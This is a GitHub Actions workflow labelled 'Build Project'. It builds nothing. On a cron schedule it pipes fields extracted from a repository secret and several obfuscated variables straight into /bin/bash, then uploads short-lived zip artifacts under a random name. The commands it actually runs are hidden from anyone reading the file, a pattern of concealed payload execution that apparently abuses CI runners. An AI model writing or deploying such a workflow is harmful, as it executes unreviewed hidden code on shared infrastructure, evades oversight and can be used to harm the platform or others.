name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '12 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          k21: ${{ secrets.k21 }}
        run: |
          printf '%s' "$k21" | jq -r .qq5277 | /bin/bash
          echo $sn0 | jq -r .gnzzv95 | /bin/bash
          echo $nc99389 | jq -r .hnoo91353 | /bin/bash
          printf '%s' "$x5397" | jq -r .yvo1714 | /bin/bash
          echo $rg1 | jq -r .djbif23123 | /bin/bash
          echo $rk816 | jq -r .wxps91 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: gk2yHvs2
          path: "*.zip"
          retention-days: 1
